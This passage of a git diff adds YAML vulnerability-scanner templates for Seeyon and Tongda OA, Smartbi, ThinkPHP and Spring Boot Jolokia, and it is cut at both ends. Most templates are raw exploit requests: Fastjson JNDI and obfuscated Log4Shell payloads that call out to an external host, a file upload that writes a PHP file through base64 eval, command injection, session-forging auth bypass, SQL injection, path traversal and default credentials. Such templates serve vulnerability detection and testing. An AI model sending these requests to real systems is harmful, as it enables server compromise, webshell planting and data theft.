0b9d6b1ab7479ab69d9f71b05e0e9445 + ------WebKitFormBoundary{{randstr_3}}-- + + - | + GET /attachements/{{randstr_1}}.php HTTP/1.1 + Host: {{Hostname}} + + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - status_code_1 == 302 + - status_code_2 == 200 && contains(body_2,'{{randstr_2}}') + condition: and + + diff --git a/http/vulnerabilities/seeyon/seeyon-ajax-unauth.yaml b/http/vulnerabilities/seeyon/seeyon-ajax-unauth.yaml new file mode 100755 index 0000000000..dc15a15da5 --- /dev/null +++ b/http/vulnerabilities/seeyon/seeyon-ajax-unauth.yaml @@ -0,0 +1,40 @@ +id: seeyon-ajax-unauth + +info: + name: Seeyon AJAX Unauthoried Access + author: pikpikcu + severity: high + description: 接口未授权访问,可调用文件上传接口上传webshell。 + reference: + - https://buaq.net/go-53721.html + - https://mp.weixin.qq.com/s/bHKDSF7HWsAgQi9rTagBQA + - http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20ajax.do%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%20CNVD-2021-01627.html + metadata: + verified: true + fofa-query: app="致远互联-OA" + tags: misconfig,seeyon,unauth,ajax + +http: + - raw: + - | + POST /seeyon/thirdpartyController.do.css/..;/ajax.do HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Accept-Encoding: gzip + + - | + GET /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Accept-Encoding: gzip + + + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200 && contains(body_1, "java.lang.NullPointerException:null")' + - 'status_code_2 == 200 && contains(body_2,"companyName")' + condition: and diff --git a/http/vulnerabilities/seeyon/seeyon-oa-a6-config-jsp-info-leak.yaml b/http/vulnerabilities/seeyon/seeyon-oa-a6-config-jsp-info-leak.yaml new file mode 100755 index 0000000000..4ff9b9b86e --- /dev/null +++ b/http/vulnerabilities/seeyon/seeyon-oa-a6-config-jsp-info-leak.yaml @@ -0,0 +1,31 @@ +id: seeyon-oa-a6-config-jsp-info-leak + +info: + name: seeyon-oa a6 config.jsp user info leak + author: SleepingBag945 + severity: medium + description: 致远OA A6 config.jsp 敏感信息泄漏 + reference: + - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java + tags: seeyon,oa + +http: + - raw: + - | + GET /yyoa/ext/trafaxserver/SystemManage/config.jsp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: word + words: + - "DatabaseName" + - type: word + words: + - "请在文本框内配置传真插件所需服务器的信息" + - type: status + status: + - 200 + +# Enhanced by cs on 2022/07/05 diff --git a/http/vulnerabilities/seeyon/seeyon-oa-a6-createMysql-info-leak.yaml b/http/vulnerabilities/seeyon/seeyon-oa-a6-createMysql-info-leak.yaml new file mode 100755 index 0000000000..b9f4b3239e --- /dev/null +++ b/http/vulnerabilities/seeyon/seeyon-oa-a6-createMysql-info-leak.yaml @@ -0,0 +1,31 @@ +id: seeyon-oa-a6-createMysql-user-info-leak + +info: + name: seeyon-oa a6 createMysql user info leak + author: SleepingBag945 + severity: medium + description: 致远OA A6 createMysql.jsp 数据库敏感信息泄露 + reference: + - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java + tags: seeyon,oa + +http: + - raw: + - | + GET /yyoa/createMysql.jsp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: word + words: + - "root
" + - type: regex + regex: + - "[*][0-zA-Z]{40}
" + - type: status + status: + - 200 + +# Enhanced by cs on 2022/07/05 diff --git a/http/vulnerabilities/seeyon/seeyon-oa-a6-initDataAssess-user-info-leak.yaml b/http/vulnerabilities/seeyon/seeyon-oa-a6-initDataAssess-user-info-leak.yaml new file mode 100755 index 0000000000..dcf004ecd8 --- /dev/null +++ b/http/vulnerabilities/seeyon/seeyon-oa-a6-initDataAssess-user-info-leak.yaml @@ -0,0 +1,31 @@ +id: seeyon-oa-a6_initDataAssess-user-info-leak + +info: + name: seeyon-oa a6 initDataAssess user info leak + author: SleepingBag945 + severity: medium + description: 致远OA A6 initDataAssess.jsp 用户敏感信息泄露 + reference: + - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java + tags: seeyon,oa + +http: + - raw: + - | + GET /yyoa/assess/js/initDataAssess.jsp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: word + words: + - "personList" + - type: word + words: + - "personHash.Add" + - type: status + status: + - 200 + +# Enhanced by cs on 2022/07/05 diff --git a/http/vulnerabilities/seeyon/seeyon-oa-a6-setextno-sqli.yaml b/http/vulnerabilities/seeyon/seeyon-oa-a6-setextno-sqli.yaml new file mode 100755 index 0000000000..2f2d910417 --- /dev/null +++ b/http/vulnerabilities/seeyon/seeyon-oa-a6-setextno-sqli.yaml @@ -0,0 +1,29 @@ +id: seeyon-oa-a6-setextno-sqli + +info: + name: seeyon-oa a6 setextno sqli + author: SleepingBag945 + severity: high + description: 致远OA A6 setextno.jsp SQL注入漏洞 + reference: + - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java + - http://wiki.peiqi.tech/wiki/oa/致远OA/致远OA%20A6%20setextno.jsp%20SQL注入漏洞.html + tags: seeyon,oa + +http: + - raw: + - | + GET /yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: word + words: + - "请填写以下用户的传真分机号" + - type: status + status: + - 200 + +# /yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999) union all select 1,2,(md5(1)),4# diff --git a/http/vulnerabilities/seeyon/seeyon-oa-a8-default-login.yaml b/http/vulnerabilities/seeyon/seeyon-oa-a8-default-login.yaml new file mode 100755 index 0000000000..81848a215d --- /dev/null +++ b/http/vulnerabilities/seeyon/seeyon-oa-a8-default-login.yaml @@ -0,0 +1,32 @@ +id: seeyon-oa-a8-default-login + +info: + name: seeyon-oa A8 default login + author: SleepingBag945 + severity: high + description: 致远(seeyon)OA A8+企业版存在弱口令漏洞,可利用该漏洞登陆后台 + tags: seeyon,oa + +http: + - raw: + - | + POST /seeyon/rest/authentication/ucpcLogin HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Content-Length: 75 + Accept: */* + Content-Type: application/x-www-form-urlencoded + Accept-Encoding: gzip + + UserAgentFrom=iphone&login_username=audit-admin&login_password=seeyon123456 + + matchers-condition: and + matchers: + - type: word + words: + - "\"LoginOK\":\"ok\"" + - type: status + status: + - 200 + +# Enhanced by cs on 2022/07/05 diff --git a/http/vulnerabilities/seeyon/seeyon-oa-a8-m-information-disclosure.yaml b/http/vulnerabilities/seeyon/seeyon-oa-a8-m-information-disclosure.yaml new file mode 100755 index 0000000000..0eee7efd1c --- /dev/null +++ b/http/vulnerabilities/seeyon/seeyon-oa-a8-m-information-disclosure.yaml @@ -0,0 +1,44 @@ +id: seeyon-oa-a8-m-information-disclosure + +info: + name: seeyon-oa-m a8 information-disclosure + author: SleepingBag945 + severity: medium + description: 致远OA A8-m 存在状态监控页面信息泄露,攻击者可以从其中获取网站路径和用户名等敏感信息进一步攻击,攻击者利用此漏洞可直接进入应用系统或者管理系统,从而进行系统、网页、数据的篡改与删除,非法获取系统、用户的数据,甚至可能导致服务器沦陷。 + reference: + - http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20A8%20status.jsp%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html + tags: seeyon,oa + +http: + - raw: + - | + POST /seeyon/management/index.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Content-Type: application/x-www-form-urlencoded + Accept-Encoding: gzip + + password=WLCCYBD%40SEEYON + + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "/seeyon/management/status.jsp" + - type: word + part: header + words: + - "Set-Cookie" + - type: status + status: + - 302 + +# Enhanced by cs on 2022/07/05 +# 登录后通过如下url访问敏感信息 +# /seeyon/management/status.jsp +# /seeyon/logs/login.log +# /seeyon/logs/v3x.log + diff --git a/http/vulnerabilities/seeyon/seeyon-oa-fastjson-rce.yaml b/http/vulnerabilities/seeyon/seeyon-oa-fastjson-rce.yaml new file mode 100755 index 0000000000..12494f1ba2 --- /dev/null +++ b/http/vulnerabilities/seeyon/seeyon-oa-fastjson-rce.yaml @@ -0,0 +1,28 @@ +id: seeyon-oa-fastjson-rce + +info: + name: seeyon-oa fastjson rce + author: SleepingBag945 + severity: critical + description: 致远OA Fastjson 远程代码执行 + reference: + - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java + tags: seeyon,oa,rce,fastjson + +http: + - raw: + - | + POST /seeyon/main.do?method=changeLocale HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + _json_params={"v47":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"xxx":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://{{interactsh-url}}","autoCommit":true}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + +# Enhanced by cs on 2022/07/05 diff --git a/http/vulnerabilities/seeyon/seeyon-oa-log4jshell.yaml b/http/vulnerabilities/seeyon/seeyon-oa-log4jshell.yaml new file mode 100755 index 0000000000..523efad643 --- /dev/null +++ b/http/vulnerabilities/seeyon/seeyon-oa-log4jshell.yaml @@ -0,0 +1,28 @@ +id: seeyon-oa-log4jshell + +info: + name: seeyon-oa log4jshell + author: SleepingBag945 + severity: critical + description: 致远OA Log4jShell + reference: + - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java + tags: seeyon,oa,rce + +http: + - raw: + - | + POST /seeyon/main.do?method=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + authorization=&login.timezone=GMT+8:00&province=&city=&rectangle=&login_username=${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://{{interactsh-url}}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + +# Enhanced by cs on 2022/07/05 diff --git a/http/vulnerabilities/seeyon/seeyon-oa-sp2-wpsAssistServlet-arbitrary-file-upload.yaml b/http/vulnerabilities/seeyon/seeyon-oa-sp2-wpsAssistServlet-arbitrary-file-upload.yaml new file mode 100755 index 0000000000..ee2a4d0161 --- /dev/null +++ b/http/vulnerabilities/seeyon/seeyon-oa-sp2-wpsAssistServlet-arbitrary-file-upload.yaml @@ -0,0 +1,29 @@ +id: seeyon-oa-sp2-wpsAssistServlet-arbitrary-file-upload + +info: + name: seeyon-oa sp2 wpsAssistServlet arbitrary file upload + author: SleepingBag945 + severity: critical + description: 致远OA SP2 wpsAssistServlet 任意文件上传 + reference: + - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java + - http://wiki.peiqi.tech/wiki/oa/致远OA/致远OA%20wpsAssistServlet%20任意文件上传漏洞.html + tags: seeyon,oa + +http: + - raw: + - | + GET /seeyon/wpsAssistServlet HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: word + words: + - "\"data\":\"flag is empty!\"" + - type: status + status: + - 200 + +# Enhanced by cs on 2022/07/05 diff --git a/http/vulnerabilities/shiziyu-cms/shiziyu-cms-apicontroller-sqli.yaml b/http/vulnerabilities/shiziyu-cms/shiziyu-cms-apicontroller-sqli.yaml new file mode 100755 index 0000000000..136040c349 --- /dev/null +++ b/http/vulnerabilities/shiziyu-cms/shiziyu-cms-apicontroller-sqli.yaml @@ -0,0 +1,26 @@ +id: shiziyu-cms-apicontroller-sqli + +info: + name: shiziyu-cms-apicontroller-sqli + author: SleepingBag945 + severity: high + description: | + 狮子鱼CMS ApiController.class.php 参数过滤存在不严谨,导致SQL注入漏洞 + metadata: + fofa-query: body="/seller.php?s=/Public/login" + tags: sqli + +http: + - raw: + - | + GET /index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5(1),0x7e),1) HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0(X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0 + + + + matchers: + - type: dsl + dsl: + - 'status_code_1 == 404 && contains(body_1,"c4ca4238a0b923820dcc509a6f75849") && contains(body_1,"syntax error")' + condition: and diff --git a/http/vulnerabilities/smartbi/smartbi-default-user.yaml b/http/vulnerabilities/smartbi/smartbi-default-user.yaml new file mode 100755 index 0000000000..6754c37abe --- /dev/null +++ b/http/vulnerabilities/smartbi/smartbi-default-user.yaml @@ -0,0 +1,33 @@ +id: smartbi-default-user + +info: + name: smartbi - Default user weakpass + author: unknown + severity: high + description: | + Smartbi default user weakpass. + reference: + - https://mp.weixin.qq.com/s?__biz=MzIwMDk1MjMyMg==&mid=2247491565&idx=1&sn=eb2af62a72167c6f82ae8ec3db878511 + tags: smartbi + +http: + - raw: + - | + POST /smartbi/vision/RMIServlet HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Content-Length: 67 + + className=UserService&methodName=loginFromDB¶ms=["system","0a"] + - | + POST /vision/RMIServlet HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Content-Length: 67 + + className=UserService&methodName=loginFromDB¶ms=["system","0a"] + matchers: + - type: word + words: + - '"result":true' + part: body \ No newline at end of file diff --git a/http/vulnerabilities/smartbi/smartbi-windowunloading-deserialization.yaml b/http/vulnerabilities/smartbi/smartbi-windowunloading-deserialization.yaml new file mode 100755 index 0000000000..a1c400efb5 --- /dev/null +++ b/http/vulnerabilities/smartbi/smartbi-windowunloading-deserialization.yaml @@ -0,0 +1,31 @@ +id: smartbi-windowunloading-deserialization + +info: + name: smartbi - Deserialization vulnerability in the windowunloading interface + author: unknown + severity: critical + description: | + Smartbi Deserialization vulnerability in the windowunloading interface. + reference: + - https://stack.chaitin.com/techblog/detail?id=122 + tags: smartbi + +http: + - raw: + - | + POST /vision/RMIServlet?windowUnloading=%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + className=UserService&methodName=isLogged¶ms=[] + - | + POST /smartbi/vision/RMIServlet?windowUnloading=%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + className=UserService&methodName=isLogged¶ms=[] + matchers: + - type: word + words: + - 'H~CxOm~' + part: body \ No newline at end of file diff --git a/http/vulnerabilities/spring/jolokia-logback-jndi-rce.yaml b/http/vulnerabilities/spring/jolokia-logback-jndi-rce.yaml new file mode 100755 index 0000000000..e22fd1bbd4 --- /dev/null +++ b/http/vulnerabilities/spring/jolokia-logback-jndi-rce.yaml @@ -0,0 +1,33 @@ +id: jolokia-logback-jndi-rce + +info: + name: jolokia-logback-jndi-rce + author: SleepingBag945 + severity: high + reference: + - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/ + - https://github.com/laluka/jolokia-exploitation-toolkit + - https://github.com/LandGrey/SpringBootVulExploit#0x04jolokia-logback-jndi-rce + tags: jolokia,springboot,tomcat + +http: + - method: GET + path: + - "{{BaseURL}}/jolokia/list" + - "{{BaseURL}}/actuator/jolokia/list" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - 'ch.qos.logback.classic.jmx.JMXConfigurator' + - type: word + part: body + words: + - 'reloadByURL' \ No newline at end of file diff --git a/http/vulnerabilities/spring/jolokia-realm-jndi-rce.yaml b/http/vulnerabilities/spring/jolokia-realm-jndi-rce.yaml new file mode 100755 index 0000000000..a5a4233c32 --- /dev/null +++ b/http/vulnerabilities/spring/jolokia-realm-jndi-rce.yaml @@ -0,0 +1,33 @@ +id: jolokia-realm-jndi-rce + +info: + name: jolokia Realm JNDI RCE + author: SleepingBag945 + severity: high + reference: + - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/ + - https://github.com/laluka/jolokia-exploitation-toolkit + - https://github.com/LandGrey/SpringBootVulExploit#0x05jolokia-realm-jndi-rce + tags: jolokia,springboot,tomcat + +http: + - method: GET + path: + - "{{BaseURL}}/jolokia/list" + - "{{BaseURL}}/actuator/jolokia/list" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - 'type=MBeanFactory' + - type: word + part: body + words: + - 'createJNDIRealm' \ No newline at end of file diff --git a/http/vulnerabilities/spring/springboot-env-all-check.yaml b/http/vulnerabilities/spring/springboot-env-all-check.yaml new file mode 100755 index 0000000000..9322cd54b2 --- /dev/null +++ b/http/vulnerabilities/spring/springboot-env-all-check.yaml @@ -0,0 +1,49 @@ +id: springboot-env-all-check + +info: + name: Springboot Env Actuator - Detect + author: that_juan_,dwisiswant0,wdahlenb,philippedelteil,stupidfish,SleepingBag945 + severity: high + description: Sensitive environment variables may not be masked + tags: misconfig,springboot,env,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/env" + - "{{BaseURL}}/actuator/env" + - "{{BaseURL}}/1/..;/env" + - "{{BaseURL}}/1/..;/actuator/env" + - "{{BaseURL}}/actuator;/env;" + - "{{BaseURL}}/message-api/actuator/env" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "applicationConfig" + - "activeProfiles" + condition: or + + - type: word + part: body + words: + - "server.port" + - "local.server.port" + condition: or + + - type: word + part: header + words: + - "application/json" + - "application/vnd.spring-boot.actuator" + - "application/vnd.spring-boot.actuator.v1+json" + - "application/vnd.spring-boot.actuator.v2+json" + - "application/vnd.spring-boot.actuator.v3+json" + condition: or + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml b/http/vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml new file mode 100755 index 0000000000..547adab487 --- /dev/null +++ b/http/vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml @@ -0,0 +1,35 @@ +id: thinkphp6-lang-lfi + +info: + name: Thinkphp Lang - LFI + author: kagamigawa + severity: high + description: | + Thinkphp,v6.0.1~v6.0.13, v5.0.x~v5.1.41, v5.0.0~v5.0.24 vulnerable to LFI.可RCE + reference: + - https://tttang.com/archive/1865/ + metadata: + verified: true + shodan-query: title:"Thinkphp" + fofa-query: header="think_lang" + tags: thinkphp,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/?lang=../../thinkphp/base" + - "{{BaseURL}}/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Call Stack' + - 'class="trace' + condition: and + + - type: status + status: + - 500 diff --git a/http/vulnerabilities/tongda/tongda-oa-api-ali-arbitrary-file-upload.yaml b/http/vulnerabilities/tongda/tongda-oa-api-ali-arbitrary-file-upload.yaml new file mode 100755 index 0000000000..4b82e671d1 --- /dev/null +++ b/http/vulnerabilities/tongda/tongda-oa-api-ali-arbitrary-file-upload.yaml @@ -0,0 +1,45 @@ +id: tongda-oa-api-ali-arbitrary-file-upload + +info: + name: tongda-oa-api-ali-arbitrary-file-upload + author: SleepingBag945 + severity: critical + description: 通达OA v11.8 api.ali.php 存在任意文件上传漏洞,攻击者通过漏可以上传恶意文件控制服务器 + reference: + - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.8%20api.ali.php%20任意文件上传漏洞.html + tags: tongda,oa + +http: + - raw: + - | + POST /mobile/api/api.ali.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=502f67681799b07e5de6b503655f5cae + Accept-Encoding: gzip + + --502f67681799b07e5de6b503655f5cae + Content-Disposition: form-data; name="file"; filename="fb6790f4.json" + Content-Type: application/octet-stream + + {"modular":"AllVariable","a":"ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw==","dataAnalysis":"{"a":"錦',$BackData[dataAnalysis] => eval(base64_decode($BackData[a])));/*"}"} + --502f67681799b07e5de6b503655f5cae-- + + - | + GET /inc/package/work.php?id=../../../../../myoa/attach/approve_center/{{trim_prefix(date_time("%Y%M", unix_time()),"20")}}/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.fb6790f4 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + - | + GET /fb6790f4.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + + # req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200' + - 'status_code_2 == 200 && contains(body_2,"OK")' + - 'status_code_3 == 200 && contains(body_3,"phpinfo")' + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/tongda/tongda-oa-getdata-rce.yaml b/http/vulnerabilities/tongda/tongda-oa-getdata-rce.yaml new file mode 100755 index 0000000000..22787e8a2f --- /dev/null +++ b/http/vulnerabilities/tongda/tongda-oa-getdata-rce.yaml @@ -0,0 +1,26 @@ +id: tongda-oa-getdata-rce + +info: + name: tongda-oa-getdata-rce + author: SleepingBag945 + severity: critical + description: 通达OA v11.9 getdata接口存在任意命令执行漏洞,攻击者通过漏洞可以执行服务器任意命令控制服务器权限 + reference: + - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.9%20getdata%20任意命令执行漏洞.html + tags: tongda,oa,rce + +http: + - raw: + - | + GET /general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22ZWNobyBqb2R3YWhmb2lhd2ppZm93YWR3Ow==%22)))%3B/*&id=19&module=Carouselimage HTTP/1.1 + Host: {{Hostname}} + + + matchers-condition: and + matchers: + - type: word + words: + - "jodwahfoiawjifowadw" + - type: status + status: + - 200 diff --git a/http/vulnerabilities/tongda/tongda-oa-getway-remote-file-include-mysql.yaml b/http/vulnerabilities/tongda/tongda-oa-getway-remote-file-include-mysql.yaml new file mode 100755 index 0000000000..3015985db4 --- /dev/null +++ b/http/vulnerabilities/tongda/tongda-oa-getway-remote-file-include-mysql.yaml @@ -0,0 +1,36 @@ +id: tongda-oa-getway-remote-file-include-mysql + +info: + name: tongda-oa-getway-remote-file-include-mysql + author: SleepingBag945 + severity: critical + description: 通达OA v11.8 getway.php 存在文件包含漏洞,攻击者通过发送恶意请求包含日志文件导致任意文件写入漏洞,利用未授权的文件上传配合任意本地文件包含,攻击者可以轻易的取得 shell 获得系统权限。 + reference: + - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.8%20getway.php%20远程文件包含漏洞.html + tags: tongda,oa + +http: + - raw: + - | + POST /mac/gateway.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Content-Type: application/x-www-form-urlencoded + Accept-Encoding: gzip + + json={"url":"/general/../../mysql5/my.ini"} + + + + matchers-condition: and + matchers: + - type: word + words: + - "[mysql]" + - type: word + words: + - "default-character-set" + - type: status + status: + - 200 diff --git a/http/vulnerabilities/tongda/tongda-oa-getway-remote-file-include.yaml b/http/vulnerabilities/tongda/tongda-oa-getway-remote-file-include.yaml new file mode 100755 index 0000000000..00c1c6262a --- /dev/null +++ b/http/vulnerabilities/tongda/tongda-oa-getway-remote-file-include.yaml @@ -0,0 +1,31 @@ +id: tongda-oa-getway-remote-file-include + +info: + name: tongda-oa-getway-remote-file-include + author: SleepingBag945 + severity: critical + description: 通达OA v11.8 getway.php 存在文件包含漏洞,攻击者通过发送恶意请求包含日志文件导致任意文件写入漏洞 + reference: + - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.8%20getway.php%20远程文件包含漏洞.html + tags: tongda,oa + +http: + - raw: + - | + POST /ispirit/interface/gateway.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Accept-Encoding: gzip + + json={"url":"/general/../../nginx/logs/oa.access.log"} + + + + matchers-condition: and + matchers: + - type: word + words: + - "ERROR URL" + - type: status + status: + - 200 diff --git a/http/vulnerabilities/tongda/tongda-oa-header-inc-arbitrary-login.yaml b/http/vulnerabilities/tongda/tongda-oa-header-inc-arbitrary-login.yaml new file mode 100755 index 0000000000..de0dca3705 --- /dev/null +++ b/http/vulnerabilities/tongda/tongda-oa-header-inc-arbitrary-login.yaml @@ -0,0 +1,44 @@ +id: tongda-oa-header-inc-arbitrary-login +info: + name: tongda-oa-header-inc-arbitrary-login + author: SleepingBag945 + severity: high + description: 通达OA是一款OA系统。其旧版本的 header.inc.php 存在认证绕过漏洞,攻击者可构造恶意请求访问 header.inc.php,获取cookie后通过身份认证,登录后台,执行相关敏感操作,造成敏感信息泄漏等等。 + reference: + - https://github.com/Phuong39/2022-HW-POC/blob/main/%E9%80%9A%E8%BE%BEOA%E7%99%BB%E5%BD%95%E8%AE%A4%E8%AF%81%E7%BB%95%E8%BF%87.md + tags: tongda,oa + +http: + - raw: + - | + POST /module/retrieve_pwd/header.inc.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Content-Type: application/x-www-form-urlencoded + Accept-Encoding: gzip + + _SESSION[LOGIN_THEME]=15&_SESSION[LOGIN_USER_ID]=1&_SESSION[LOGIN_UID]=1&_SESSION[LOGIN_FUNC_STR]=1,3,42,643,644,634,4,147,148,7,8,9,10,16,11,130,5,131,132,256,229,182,183,194,637,134,37,135,136,226,253,254,255,536,24,196,105,119,80,96,97,98,114,126,179,607,539,251,127,238,128,85,86,87,88,89,137,138,222,90,91,92,152,93,94,95,118,237,108,109,110,112,51,53,54,153,217,150,239,240,218,219,43,17,18,19,15,36,70,76,77,115,116,185,235,535,59,133,64,257,2,74,12,68,66,67,13,14,40,41,44,75,27,60,61,481,482,483,484,485,486,487,488,489,490,491,492,120,494,495,496,497,498,499,500,501,502,503,505,504,26,506,507,508,515,537,122,123,124,628,125,630,631,632,633,55,514,509,29,28,129,510,511,224,39,512,513,252,230,231,232,629,233,234,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,200,202,201,203,204,205,206,207,208,209,65,187,186,188,189,190,191,606,192,193,221,550,551,73,62,63,34,532,548,640,641,642,549,601,600,602,603,604,46,21,22,227,56,30,31,33,32,605,57,609,103,146,107,197,228,58,538,151,6,534,69,71,72,223,639,225,236,78,178,104,121,149,84,99,100,533,101,113,198,540,626,638,38,&_SESSION[LOGIN_USER_PRIV]=1&_SESSION[LOGIN_USER_PRIV_OTHER]=1&_SESSION[LOGIN_USER_PRIV_TYPE]=1&_SESSION[LOGIN_NOT_VIEW_USER]=0&_SESSION[RETRIEVE_PWD_USER]=1 + + - | + GET /general/index.php HTTP/1.1 + Host: {{Hostname}} + Cookie: PHPSESSID={{cookie}}; + + + extractors: + - type: regex + name: cookie + internal: true + part: header + group: 1 + regex: + - 'PHPSESSID=(.*?);' + + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200 && contains(header_1, "Set-Cookie") && contains(header_1,"PHPSESSID")' + - 'status_code_2 == 200 && !contains(body_2,"用户未登录") && contains(body_2,"loginUser")' + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/tongda/tongda-oa-insert-sqli.yaml b/http/vulnerabilities/tongda/tongda-oa-insert-sqli.yaml new file mode 100755 index 0000000000..6d606b493c --- /dev/null +++ 